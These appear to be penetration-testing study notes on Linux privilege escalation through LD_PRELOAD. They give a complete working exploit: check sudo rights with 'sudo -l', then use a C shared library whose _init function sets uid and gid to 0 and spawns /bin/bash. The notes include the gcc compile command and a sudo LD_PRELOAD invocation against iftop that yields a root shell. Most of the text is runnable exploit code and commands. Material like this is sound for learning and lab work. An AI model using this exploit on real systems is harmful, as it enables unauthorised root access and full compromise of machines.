LD_PRELOAD

How to identify:

sudo -l

available on most Unix systems

We’re (pre)loading our own library into whatever sudo command we have access to.

We need to make a malicious library:

on victim:

nano shell.c

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

We’re making our user root and opening a bash shell using our malicious library preloaded!

in nano:

1. ctrl+x
2. y (save)
3. enter

Compile the file:

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

• the -fPIC means position independent code
• regardless where the shell addressing is, this is going to function

syntax to run after compiling:

sudo LD_PRELOAD=/whateverthepathis/shell.so somethingwecanrunasrootfromsudoLcommand

sudo LD_PRELOAD=/home/user/shell.so /usr/sbin/iftop